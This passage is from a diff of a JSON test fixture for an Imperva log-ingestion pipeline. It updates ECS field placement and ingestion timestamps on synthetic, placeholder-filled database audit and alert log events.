13:57:58,srvGroup=aliqu,service=sequine,appName=utaliqui,event#=isciv,eventType=Logout,usrGroup=osqu,usrAuth=False,application=\"ptatemse\",osUsername=itationu,srcHost=setquas6188.internal.local,dbName=magnaali,schemaName=velillum,bindVar=ionev,sqlError=success,respSize=7245,respTime=131.118000,affRows=ameaq,action=\"cancel\",rawQuery=\"Except\"", "event": { - "ingested": "2021-06-09T11:17:04.825951100Z" + "ingested": "2021-12-14T14:46:55.618562967Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=uiac,createTime=2017-10-04 21:00:32,eventType=tquii,eventSev=low,username=reme,subsystem=emeumfu,message=\"inBCSedu\"", "event": { - "ingested": "2021-06-09T11:17:04.825954800Z" + "ingested": "2021-12-14T14:46:55.618563353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.208.33.55,dstPort=1849,dbUsername=ulapari,srcIP=10.248.102.129,srcPort=3510,creatTime=2017-10-19 04:03:07,srvGroup=iatn,service=saquaeab,appName=eli,event#=rissusci,eventType=Logout,usrGroup=ectetur,usrAuth=True,application=\"dictasun\",osUsername=inimv,srcHost=nibusBo3674.www5.localhost,dbName=ntut,schemaName=mremaper,bindVar=uteirur,sqlError=unknown,respSize=6433,respTime=111.360000,affRows=isni,action=\"accept\",rawQuery=\"quovo\"", "event": { - "ingested": "2021-06-09T11:17:04.825958700Z" + "ingested": "2021-12-14T14:46:55.618563835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.203.164.132,dstPort=6213,dbUsername=mporin,srcIP=10.109.230.216,srcPort=4447,creatTime=2017-11-02 
11:05:41,srvGroup=uov,service=pariat,appName=icaboNe,event#=boreetd,eventType=Logout,usrGroup=uir,usrAuth=True,application=\"rumex\",osUsername=ectobea,srcHost=totamr7676.www5.home,dbName=imadm,schemaName=ibus,bindVar=lumdol,sqlError=success,respSize=547,respTime=166.971000,affRows=reprehe,action=\"block\",rawQuery=\"ihil\"", "event": { - "ingested": "2021-06-09T11:17:04.825962400Z" + "ingested": "2021-12-14T14:46:55.618564221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.151.203.60,dstPort=482,dbUsername=dol,srcIP=10.117.81.75,srcPort=3365,creatTime=16 November 2017 18:08:15,srvGroup=iciatis,service=agn,appName=cul,event#=tate,eventType=Login,usrGroup=psam,usrAuth=True,application=\"itaedi\",osUsername=exeac,srcHost=idents7231.mail.home,dbName=veniamqu,schemaName=iconsequ,bindVar=ueporr,sqlError=unknown,respSize=484,respTime=27.563000,affRows=tur,action=\"block\",rawQuery=\"onorumet\"", "event": { - "ingested": "2021-06-09T11:17:04.825966400Z" + "ingested": "2021-12-14T14:46:55.618564605Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.224.217.153,dstPort=6339,dbUsername=eriti,srcIP=10.45.152.205,srcPort=6907,creatTime=1 December 2017 01:10:49,srvGroup=riame,service=datatn,appName=seq,event#=mquis,eventType=Login,usrGroup=tur,usrAuth=True,application=\"itation\",osUsername=utlabo,srcHost=tat50.mail.host,dbName=essequam,schemaName=imav,bindVar=mtot,sqlError=success,respSize=922,respTime=17.709000,affRows=prehend,action=\"allow\",rawQuery=\"liquid\"", "event": { - "ingested": "2021-06-09T11:17:04.825970200Z" + "ingested": "2021-12-14T14:46:55.618564993Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%IMPERVA-Imperva,alert#=umq,event#=ipsu,createTime=2017-12-15 08:13:24,updateTime=oremip,alertSev=low,group=odit,ruleName=\"vol\",evntDesc=\"epteurs\",category=itse,disposition=rever,eventType=sBonoru,proto=udp,srcPort=2652,srcIP=10.60.164.100,dstPort=5119,dstIP=10.1.193.187,policyName=\"yCice\",occurrences=508,httpHost=ionem,webMethod=taevitae,url=\"https://api.example.net/quam/saute.htm?nostru=docons#emipsumq\",webQuery=\"orinr\",soapAction=ineavol,resultCode=umdo,sessionID=tass,username=ugi,addUsername=riat,responseTime=atvol,responseSize=emipsum,direction=internal,dbUsername=uameiu,queryGroup=quiado,application=\"conse\",srcHost=mips3283.corp,osUsername=hite,schemaName=adipis,dbName=abo,hdrName=suntex,action=\"allow\",errormsg=\"failure\"", "event": { - "ingested": "2021-06-09T11:17:04.825974Z" + "ingested": "2021-12-14T14:46:55.618565374Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.248.244.203,dstPort=806,dbUsername=mquamei,srcIP=10.146.228.234,srcPort=4346,creatTime=2017-12-29 15:15:58,srvGroup=rissusci,service=uaturQ,appName=iusmod,event#=susc,eventType=taed,usrGroup=eatae,usrAuth=siutali,application=\"oloremq\",osUsername=sum,srcHost=aliquip7229.mail.domain,dbName=doe,schemaName=eiusm,bindVar=oremipsu,sqlError=failure,respSize=3058,respTime=133.358000,affRows=llum,action=\"allow\",rawQuery=\"mto\"", "event": { - "ingested": "2021-06-09T11:17:04.825977900Z" + "ingested": "2021-12-14T14:46:55.618565831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.122.127.237,dstPort=1138,dbUsername=consecte,srcIP=10.86.121.152,srcPort=3971,creatTime=2018-01-12 
22:18:32,srvGroup=mquamei,service=litesse,appName=fug,event#=liquid,eventType=Logout,usrGroup=uidex,usrAuth=False,application=\"umdolo\",osUsername=nimv,srcHost=fde7756.mail.corp,dbName=usmod,schemaName=ine,bindVar=qui,sqlError=success,respSize=2771,respTime=136.167000,affRows=orsitame,action=\"block\",rawQuery=\"ipex\"", "event": { - "ingested": "2021-06-09T11:17:04.825981800Z" + "ingested": "2021-12-14T14:46:55.618566323Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.201.223.119,dstPort=3614,dbUsername=rcit,srcIP=10.204.223.184,srcPort=6092,creatTime=2018-01-27 05:21:06,srvGroup=giat,service=nculpa,appName=olupt,event#=tvol,eventType=Logout,usrGroup=ostru,usrAuth=True,application=\"mea\",osUsername=tuserror,srcHost=agnama5013.internal.example,dbName=boreetdo,schemaName=teni,bindVar=iin,sqlError=unknown,respSize=4113,respTime=161.837000,affRows=tNeq,action=\"block\",rawQuery=\"liq\"", "event": { - "ingested": "2021-06-09T11:17:04.825985700Z" + "ingested": "2021-12-14T14:46:55.618566713Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.200.12.126,dstPort=2347,dbUsername=magnido,srcIP=10.223.56.33,srcPort=5899,creatTime=10 February 2018 12:23:41,srvGroup=ing,service=amal,appName=aliq,event#=utem,eventType=Login,usrGroup=oreetd,usrAuth=True,application=\"itatis\",osUsername=Nequepo,srcHost=edictas4693.home,dbName=borisnis,schemaName=elitsedd,bindVar=hitecto,sqlError=failure,respSize=3243,respTime=75.415000,affRows=imven,action=\"block\",rawQuery=\"hende\"", "event": { - "ingested": "2021-06-09T11:17:04.825989700Z" + "ingested": "2021-12-14T14:46:55.618567111Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%IMPERVA-Imperva,alert#=deseru,event#=aquioff,createTime=2018-02-24 19:26:15,updateTime=cip,alertSev=very-high,group=onsequat,ruleName=\"tiumd\",evntDesc=\"atuse\",category=imad,disposition=tura,eventType=equuntur,proto=ipv6,srcPort=428,srcIP=10.94.89.177,dstPort=1752,dstIP=10.65.225.101,policyName=\"nulapari\",occurrences=2513,httpHost=ostrumex,webMethod=eruntmol,url=\"https://internal.example.com/imide/uiineav.htm?lloinve=eni#asia\",webQuery=\"edquiac\",soapAction=psamvolu,resultCode=teturad,sessionID=ritq,username=tuserror,addUsername=tla,responseTime=orroq,responseSize=modtempo,direction=outbound,dbUsername=uptate,queryGroup=sumqui,application=\"eritin\",srcHost=nibu2565.api.local,osUsername=citation,schemaName=emquel,dbName=rspiciat,hdrName=iavol,action=\"cancel\",errormsg=\"unknown\"", "event": { - "ingested": "2021-06-09T11:17:04.825993400Z" + "ingested": "2021-12-14T14:46:55.618567508Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.65.174.196,dstPort=472,dbUsername=iin,srcIP=10.191.184.105,srcPort=6821,creatTime=2018-03-11 02:28:49,srvGroup=iat,service=orain,appName=equaturQ,event#=llu,eventType=quaUt,usrGroup=labor,usrAuth=oris,application=\"tatemse\",osUsername=uta,srcHost=tsun7120.home,dbName=per,schemaName=tione,bindVar=nibus,sqlError=unknown,respSize=5836,respTime=61.864000,affRows=olo,action=\"deny\",rawQuery=\"BCSedutp\"", "event": { - "ingested": "2021-06-09T11:17:04.825997200Z" + "ingested": "2021-12-14T14:46:55.618567957Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=tdolor,event#=Ute,createTime=2018-03-25 
09:31:24,updateTime=tura,alertSev=very-high,group=umSecti,ruleName=\"eabil\",evntDesc=\"ibusB\",category=rporis,disposition=etco,eventType=mip,proto=rdp,srcPort=6078,srcIP=10.224.148.48,dstPort=2803,dstIP=10.41.181.179,policyName=\"siarch\",occurrences=7468,httpHost=setq,webMethod=rumwr,url=\"https://api.example.com/ptatem/mporain.gif?corpo=commod#iumd\",webQuery=\"ntore\",soapAction=tect,resultCode=ion,sessionID=tutl,username=niam,addUsername=oru,responseTime=mcorp,responseSize=uelaud,direction=outbound,dbUsername=ameiu,queryGroup=utei,application=\"caecat\",srcHost=lumquid6940.mail.localdomain,osUsername=equepor,schemaName=iosamn,dbName=erspicia,hdrName=neavolup,action=\"deny\",errormsg=\"success\"", "event": { - "ingested": "2021-06-09T11:17:04.826001400Z" + "ingested": "2021-12-14T14:46:55.618568344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.21.208.103,dstPort=5543,dbUsername=imidest,srcIP=10.21.61.134,srcPort=6124,creatTime=2018-04-08 16:33:58,srvGroup=iacon,service=ncu,appName=quaturve,event#=ciad,eventType=Logout,usrGroup=diconseq,usrAuth=False,application=\"utod\",osUsername=ostr,srcHost=amcorp7299.api.example,dbName=uptatem,schemaName=mipsa,bindVar=nproide,sqlError=success,respSize=7766,respTime=91.186000,affRows=siutali,action=\"deny\",rawQuery=\"nemullam\"", "event": { - "ingested": "2021-06-09T11:17:04.826022800Z" + "ingested": "2021-12-14T14:46:55.618568734Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.23.6.216,dstPort=4578,dbUsername=iarchit,srcIP=10.221.192.116,srcPort=4688,creatTime=2018-04-22 
23:36:32,srvGroup=usBonor,service=mide,appName=sten,event#=enderi,eventType=Logout,usrGroup=labore,usrAuth=False,application=\"uasiarch\",osUsername=iamquisn,srcHost=magnama868.api.local,dbName=Section,schemaName=tevelite,bindVar=esciunt,sqlError=success,respSize=639,respTime=6.388000,affRows=borisnis,action=\"accept\",rawQuery=\"oremagn\"", "event": { - "ingested": "2021-06-09T11:17:04.826030800Z" + "ingested": "2021-12-14T14:46:55.618569122Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=rcita,event#=ataev,createTime=2018-05-07 06:39:06,updateTime=oris,alertSev=very-high,group=tate,ruleName=\"tutlabo\",evntDesc=\"nto\",category=sciv,disposition=tlabo,eventType=nsequun,proto=ipv6,srcPort=2976,srcIP=10.191.142.143,dstPort=5850,dstIP=10.240.62.238,policyName=\"sintoc\",occurrences=7580,httpHost=laboris,webMethod=ali,url=\"https://www5.example.net/aUten/edutpers.gif?apariatu=mnisis#onsequa\",webQuery=\"sunt\",soapAction=orumSe,resultCode=olupta,sessionID=emveleum,username=modtempo,addUsername=mfugi,responseTime=roqui,responseSize=ntutlabo,direction=external,dbUsername=isq,queryGroup=eacommo,application=\"amqua\",srcHost=tionevol3157.mail.invalid,osUsername=nofde,schemaName=animide,dbName=Lore,hdrName=oin,action=cancel", "event": { - "ingested": "2021-06-09T11:17:04.826036400Z" + "ingested": "2021-12-14T14:46:55.618569527Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ecatcu,event#=entoreve,createTime=2018-05-21 
13:41:41,updateTime=ion,alertSev=very-high,group=onev,ruleName=\"atu\",evntDesc=\"adeseru\",category=sitas,disposition=eni,eventType=cte,proto=igmp,srcPort=3124,srcIP=10.178.79.217,dstPort=7499,dstIP=10.111.22.134,policyName=\"datatno\",occurrences=3538,httpHost=siar,webMethod=orisnis,url=\"https://www.example.net/mvolup/pidat.jpg?ents=nsec#iaeco\",webQuery=\"ommodoco\",soapAction=ritinv,resultCode=rita,sessionID=oidents,username=ccusan,addUsername=inimav,responseTime=quel,responseSize=ugitsed,direction=external,dbUsername=idolor,queryGroup=xplic,application=\"stenat\",srcHost=mquis319.api.local,osUsername=inibusBo,schemaName=tqui,dbName=sequun,hdrName=nimadm,action=deny", "event": { - "ingested": "2021-06-09T11:17:04.826040800Z" + "ingested": "2021-12-14T14:46:55.618569976Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.161.225.172,dstPort=3708,dbUsername=meaqu,srcIP=10.77.86.215,srcPort=6390,creatTime=4 June 2018 20:44:15,srvGroup=con,service=aeabil,appName=iumtot,event#=edicta,eventType=Login,usrGroup=itaspern,usrAuth=False,application=\"tau\",osUsername=rcit,srcHost=urad5712.api.host,dbName=sitamet,schemaName=xerc,bindVar=mcolabor,sqlError=success,respSize=7286,respTime=143.926000,affRows=evita,action=\"block\",rawQuery=\"ant\"", "event": { - "ingested": "2021-06-09T11:17:04.826045100Z" + "ingested": "2021-12-14T14:46:55.618570383Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.186.133.184,dstPort=7864,dbUsername=boriosa,srcIP=10.211.161.187,srcPort=843,creatTime=2018-06-19 
03:46:49,srvGroup=laud,service=uido,appName=uis,event#=msequin,eventType=autem,usrGroup=mporai,usrAuth=ipi,application=\"qua\",osUsername=acons,srcHost=enbyCic4659.www5.example,dbName=orroqui,schemaName=sci,bindVar=psamvolu,sqlError=unknown,respSize=1578,respTime=66.164000,affRows=temse,action=\"deny\",rawQuery=\"onevol\"", "event": { - "ingested": "2021-06-09T11:17:04.826049200Z" + "ingested": "2021-12-14T14:46:55.618570809Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.160.147.230,dstPort=2126,dbUsername=nimvenia,srcIP=10.254.198.47,srcPort=3925,creatTime=2018-07-03 10:49:23,srvGroup=lit,service=quin,appName=adipisc,event#=sedqui,eventType=ueporroq,usrGroup=dolo,usrAuth=adm,application=\"dolor\",osUsername=ndeomnis,srcHost=inBCSed5308.api.corp,dbName=modicons,schemaName=illoin,bindVar=rinre,sqlError=unknown,respSize=5988,respTime=34.664000,affRows=olorem,action=\"cancel\",rawQuery=\"dquiaco\"", "event": { - "ingested": "2021-06-09T11:17:04.826052900Z" + "ingested": "2021-12-14T14:46:55.618571201Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.40.24.93,dstPort=7487,dbUsername=mSecti,srcIP=10.182.197.243,srcPort=3687,creatTime=2018-07-17 17:51:58,srvGroup=xerci,service=qua,appName=iaecons,event#=pteurs,eventType=Logout,usrGroup=intocc,usrAuth=True,application=\"abo\",osUsername=orisnis,srcHost=reseo2067.api.localdomain,dbName=nsectetu,schemaName=exerci,bindVar=lit,sqlError=success,respSize=4129,respTime=171.277000,affRows=ono,action=\"cancel\",rawQuery=\"equuntu\"", "event": { - "ingested": "2021-06-09T11:17:04.826056600Z" + "ingested": "2021-12-14T14:46:55.618571658Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%IMPERVA-Imperva,dstIP=10.249.13.159,dstPort=3023,dbUsername=uisautei,srcIP=10.108.130.106,srcPort=7601,creatTime=1 August 2018 00:54:32,srvGroup=scinge,service=lum,appName=iinea,event#=xercit,eventType=Login,usrGroup=reh,usrAuth=False,application=\"velitess\",osUsername=colab,srcHost=itte6905.mail.invalid,dbName=tesseq,schemaName=exeacomm,bindVar=uptat,sqlError=success,respSize=1044,respTime=112.679000,affRows=ptatema,action=\"cancel\",rawQuery=\"cepteurs\"", "event": { - "ingested": "2021-06-09T11:17:04.826060400Z" + "ingested": "2021-12-14T14:46:55.618572053Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ioffic,event#=rumetMal,createTime=2018-08-15 07:57:06,updateTime=tiumtot,alertSev=very-high,group=caboNe,ruleName=\"ptate\",evntDesc=\"enimips\",category=Nequepor,disposition=nisiu,eventType=ptat,proto=ggp,srcPort=4082,srcIP=10.64.94.174,dstPort=3852,dstIP=10.39.244.49,policyName=\"ctas\",occurrences=7128,httpHost=sequ,webMethod=gna,url=\"https://internal.example.org/aev/uovolup.txt?aqueip=aqueip#rautod\",webQuery=\"tur\",soapAction=minimav,resultCode=uovo,sessionID=aven,username=Sedut,addUsername=stiaec,responseTime=rveli,responseSize=serr,direction=internal,dbUsername=uid,queryGroup=lamcor,application=\"rorsitv\",srcHost=caboNemo274.www.host,osUsername=estiae,schemaName=iunt,dbName=eFinibu,hdrName=uisaut,action=cancel", "event": { - "ingested": "2021-06-09T11:17:04.826064300Z" + "ingested": "2021-12-14T14:46:55.618572440Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=odit,createTime=2018-08-29 14:59:40,eventType=ercitati,eventSev=very-high,username=imad,subsystem=olo,message=\"deserun\"", "event": { - "ingested": "2021-06-09T11:17:04.826068200Z" + "ingested": "2021-12-14T14:46:55.618572828Z" + }, + "ecs": { + "version": "1.12.0" }, 
"tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=scingeli,createTime=2018-09-12 22:02:15,eventType=uatDuis,eventSev=medium,username=apari,subsystem=itesseci,message=\"utali\"", "event": { - "ingested": "2021-06-09T11:17:04.826071900Z" + "ingested": "2021-12-14T14:46:55.618573221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.115.203.143,dstPort=6889,dbUsername=utoditau,srcIP=10.134.135.22,srcPort=1809,creatTime=27 September 2018 05:04:49,srvGroup=serror,service=itl,appName=Bonoru,event#=rumetMa,eventType=Login,usrGroup=entor,usrAuth=False,application=\"urere\",osUsername=involu,srcHost=qui5978.api.test,dbName=amre,schemaName=orpori,bindVar=sistena,sqlError=failure,respSize=7868,respTime=5.277000,affRows=borisn,action=\"cancel\",rawQuery=\"quatu\"", "event": { - "ingested": "2021-06-09T11:17:04.826075500Z" + "ingested": "2021-12-14T14:46:55.618573664Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.43.244.252,dstPort=1752,dbUsername=inculp,srcIP=10.251.212.166,srcPort=3925,creatTime=11 October 2018 12:07:23,srvGroup=iur,service=aboNemo,appName=tsedquia,event#=ididun,eventType=Login,usrGroup=tatiset,usrAuth=False,application=\"enim\",osUsername=gnido,srcHost=iamq2577.internal.corp,dbName=uisa,schemaName=uptat,bindVar=siutal,sqlError=unknown,respSize=6947,respTime=144.976000,affRows=tempori,action=\"accept\",rawQuery=\"lamco\"", "event": { - "ingested": "2021-06-09T11:17:04.826079300Z" + "ingested": "2021-12-14T14:46:55.618574076Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=nimve,createTime=2018-10-25 
19:09:57,eventType=edutpe,eventSev=medium,username=isunde,subsystem=nimadm,message=\"cepte\"", "event": { - "ingested": "2021-06-09T11:17:04.826083300Z" + "ingested": "2021-12-14T14:46:55.618575831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.20.231.188,dstPort=1200,dbUsername=tesseq,srcIP=10.88.189.164,srcPort=1373,creatTime=2018-11-09 02:12:32,srvGroup=iusmod,service=aincid,appName=giatq,event#=tion,eventType=Logout,usrGroup=tNeque,usrAuth=False,application=\"uidolore\",osUsername=uatDuisa,srcHost=usB4127.localhost,dbName=ufugia,schemaName=mqu,bindVar=remagna,sqlError=failure,respSize=1623,respTime=33.468000,affRows=Uteni,action=\"cancel\",rawQuery=\"porinci\"", "event": { - "ingested": "2021-06-09T11:17:04.826088500Z" + "ingested": "2021-12-14T14:46:55.618576221Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=edd,createTime=2018-11-23 09:15:06,eventType=uianon,eventSev=low,username=quamquae,subsystem=aaliq,message=\"nos\"", "event": { - "ingested": "2021-06-09T11:17:04.826092200Z" + "ingested": "2021-12-14T14:46:55.618576599Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.231.77.26,dstPort=7082,dbUsername=rehe,srcIP=10.225.11.197,srcPort=3513,creatTime=7 December 2018 16:17:40,srvGroup=siarchi,service=seddoeiu,appName=lorinrep,event#=isq,eventType=Login,usrGroup=quines,usrAuth=False,application=\"entsu\",osUsername=ineavol,srcHost=abor3266.mail.home,dbName=voluptat,schemaName=volu,bindVar=iutaliqu,sqlError=failure,respSize=3064,respTime=61.960000,affRows=iusmo,action=\"allow\",rawQuery=\"uovo\"", "event": { - "ingested": "2021-06-09T11:17:04.826096200Z" + "ingested": "2021-12-14T14:46:55.618577253Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.148.3.197,dstPort=979,dbUsername=usa,srcIP=10.106.166.105,srcPort=4567,creatTime=2018-12-21 23:20:14,srvGroup=oremagna,service=siuta,appName=amnihil,event#=nderit,eventType=ficia,usrGroup=tru,usrAuth=tionu,application=\"natuser\",osUsername=olupt,srcHost=eprehe2455.www.home,dbName=smo,schemaName=avolup,bindVar=litse,sqlError=failure,respSize=2658,respTime=84.894000,affRows=untutlab,action=\"allow\",rawQuery=\"byCicer\"", "event": { - "ingested": "2021-06-09T11:17:04.826100100Z" + "ingested": "2021-12-14T14:46:55.618577762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.172.121.239,dstPort=5339,dbUsername=iuta,srcIP=10.57.169.205,srcPort=3093,creatTime=2019-01-05 06:22:49,srvGroup=reeufugi,service=oloree,appName=xeaco,event#=urm,eventType=Logout,usrGroup=mpo,usrAuth=False,application=\"cept\",osUsername=ctas,srcHost=destla2110.www5.localdomain,dbName=inea,schemaName=ipsu,bindVar=iden,sqlError=failure,respSize=392,respTime=19.061000,affRows=reetd,action=\"cancel\",rawQuery=\"maven\"", "event": { - "ingested": "2021-06-09T11:17:04.826104Z" + "ingested": "2021-12-14T14:46:55.618578154Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.129.234.200,dstPort=3833,dbUsername=tisundeo,srcIP=10.42.218.103,srcPort=3315,creatTime=19 January 2019 13:25:23,srvGroup=mnis,service=tametco,appName=snisiut,event#=lit,eventType=Login,usrGroup=laborio,usrAuth=False,application=\"aaliqu\",osUsername=tevelit,srcHost=exerc3694.api.home,dbName=consec,schemaName=dquia,bindVar=cep,sqlError=success,respSize=6709,respTime=34.273000,affRows=volupta,action=\"allow\",rawQuery=\"ipex\"", "event": { - "ingested": 
"2021-06-09T11:17:04.826107800Z" + "ingested": "2021-12-14T14:46:55.618578537Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.111.132.221,dstPort=2262,dbUsername=ali,srcIP=10.76.121.224,srcPort=4305,creatTime=2019-02-02 20:27:57,srvGroup=xcep,service=ehen,appName=remap,event#=mUt,eventType=Logout,usrGroup=admi,usrAuth=True,application=\"siarch\",osUsername=oloremi,srcHost=ididu5928.www5.local,dbName=tNe,schemaName=scive,bindVar=tcupi,sqlError=unknown,respSize=6155,respTime=139.491000,affRows=Sed,action=\"cancel\",rawQuery=\"ita\"", "event": { - "ingested": "2021-06-09T11:17:04.826111400Z" + "ingested": "2021-12-14T14:46:55.618579183Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.195.8.141,dstPort=4342,dbUsername=enimip,srcIP=10.17.214.21,srcPort=4821,creatTime=17 February 2019 03:30:32,srvGroup=umquiado,service=taspe,appName=empori,event#=mipsum,eventType=Login,usrGroup=tium,usrAuth=True,application=\"riaturE\",osUsername=ota,srcHost=boriosa7066.www.corp,dbName=Nequep,schemaName=dolo,bindVar=exeacom,sqlError=success,respSize=469,respTime=146.775000,affRows=eufugiat,action=\"accept\",rawQuery=\"non\"", "event": { - "ingested": "2021-06-09T11:17:04.826130400Z" + "ingested": "2021-12-14T14:46:55.618579583Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.173.13.179,dstPort=1211,dbUsername=ptasn,srcIP=10.179.60.167,srcPort=1124,creatTime=2019-03-03 
10:33:06,srvGroup=amqui,service=itatise,appName=utlab,event#=ostr,eventType=Logout,usrGroup=liqu,usrAuth=True,application=\"cons\",osUsername=apar,srcHost=ssusc1892.internal.host,dbName=xplic,schemaName=isn,bindVar=quepor,sqlError=failure,respSize=758,respTime=58.800000,affRows=etur,action=\"block\",rawQuery=\"cusan\"", "event": { - "ingested": "2021-06-09T11:17:04.826136900Z" + "ingested": "2021-12-14T14:46:55.618579973Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.42.135.34,dstPort=4361,dbUsername=tiset,srcIP=10.178.190.123,srcPort=3288,creatTime=2019-03-17 17:35:40,srvGroup=xercitat,service=ueporr,appName=utlab,event#=entoreve,eventType=Logout,usrGroup=lmolest,usrAuth=False,application=\"ser\",osUsername=ore,srcHost=iatisund424.mail.localdomain,dbName=tametcon,schemaName=orsi,bindVar=ull,sqlError=success,respSize=2290,respTime=1.468000,affRows=etdolore,action=\"cancel\",rawQuery=\"ore\"", "event": { - "ingested": "2021-06-09T11:17:04.826141600Z" + "ingested": "2021-12-14T14:46:55.618580375Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=ectetur,createTime=2019-04-01 00:38:14,eventType=cons,eventSev=medium,username=fugit,subsystem=dantiu,message=\"ntutla\"", "event": { - "ingested": "2021-06-09T11:17:04.826146100Z" + "ingested": "2021-12-14T14:46:55.618580761Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 